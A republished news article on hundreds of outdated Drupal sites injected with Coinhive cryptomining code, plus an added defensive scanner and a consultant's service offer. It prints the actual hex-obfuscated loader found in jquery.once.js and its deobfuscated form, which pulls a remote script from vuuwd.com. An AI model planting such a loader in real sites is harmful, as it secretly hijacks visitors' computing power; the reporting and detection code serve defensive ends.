Outdated website software lets hackers mine cryptocurrencies at your expense

An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites, including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.

 

The hack uses a form of code injection that forces the browser to run Coinhive, a small bit of JavaScript-based mining software. The code mines Monero, the ostensibly anonymous cryptocurrency.

The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.

Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.

“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.

The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')
[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); 
ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; 
ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= 
'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; 
dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Which, deobfuscated, translates to:

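'use strict';
// Look up the page's <head> element.
var dZ1 = window["document"]["getElementsByTagName"]("head")[0];
// Create a new <script> element.
var ZBRnO2 = window["document"]["createElement"]("script");
/** @type {string} */
ZBRnO2["type"] = "text/javascript";
/** @type {string} */
ZBRnO2["id"] = "m_g_a";
/** @type {string} */
ZBRnO2["src"] = "https://vuuwd.com/t.js";
// Append it to <head>, which makes the browser fetch and run the remote file.
dZ1["appendChild"](ZBRnO2);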

The domain it calls, vuuwd.com, is down.
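
A defender-side check for the pattern shown above, as an added example that is not part of the original article or of Mursch's report: it decodes \xNN escapes in a JavaScript file's text and flags code that creates a script element, assigns it an external src and appends it. The sample file contents are constructed to mirror the injected line, and the function names and the allowedHosts parameter are assumptions.

```javascript
// Added example (not from the article): static scan of a .js file's text.
// Decode \xNN escapes so hidden property names and URLs become readable.
function decodeHexEscapes(source) {
  return source.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Share of the file made of \xNN escapes; ordinary library code sits near 0.
function hexEscapeRatio(source) {
  const hits = source.match(/\\x[0-9a-fA-F]{2}/g) || [];
  return source.length ? (hits.length * 4) / source.length : 0;
}

// allowedHosts (assumed parameter): hosts the site really loads scripts from.
function scanForInjectedLoader(source, allowedHosts = []) {
  const decoded = decodeHexEscapes(source);
  const createsScript =
    /createElement["'\]]*\s*\(\s*["']script["']\s*\)/.test(decoded);
  const appends = /appendChild/.test(decoded);
  // Matches both obj["src"] = '...' and obj.src = '...'
  const srcRe =
    /(?:\[\s*["']src["']\s*\]|\.src)\s*=\s*["']((?:https?:)?\/\/[^"']+)["']/g;
  const externalSources = [];
  for (const m of decoded.matchAll(srcRe)) {
    const host = new URL(m[1], 'https://base.invalid').hostname;
    if (!allowedHosts.includes(host)) externalSources.push({ url: m[1], host });
  }
  const suspicious = createsScript && appends && externalSources.length > 0;
  return { hexRatio: hexEscapeRatio(source), externalSources, suspicious };
}

// Constructed sample: a clean library body plus a tail shaped like the
// injected line on this page, hex-encoded at run time.
const hex = s => [...s].map(
  c => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const q = s => '"' + hex(s) + '"';
const CLEAN_JS = '(function($){$.fn.once=function(id){return this;};})(jQuery);';
const INFECTED_JS = CLEAN_JS + '\n' +
  'var a=window[' + q('document') + '][' + q('getElementsByTagName') + '](' +
  q('head') + ')[0];var b=window[' + q('document') + '][' +
  q('createElement') + '](' + q('script') + ');b[' + q('src') + ']=' +
  q('https://vuuwd.com/t.js') + ';a[' + q('appendChild') + '](b);';

console.log(scanForInjectedLoader(INFECTED_JS));
```

Run it over the site's JavaScript files and compare any hit against a clean copy of the same file from the matching Drupal release.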

BadPackets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.

“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.

[Article taken from: https://techcrunch.com/2018/05/09/outdated-website-software-lets-hackers-mine-cryptocurrencies-at-your-expense/]

--------------------------

If you need help updating your Drupal 7 site to the latest version to protect it from this hack, drop me a message.

To find out if your site is being used for mining, visit this website to check: https://whoismining.com 

 
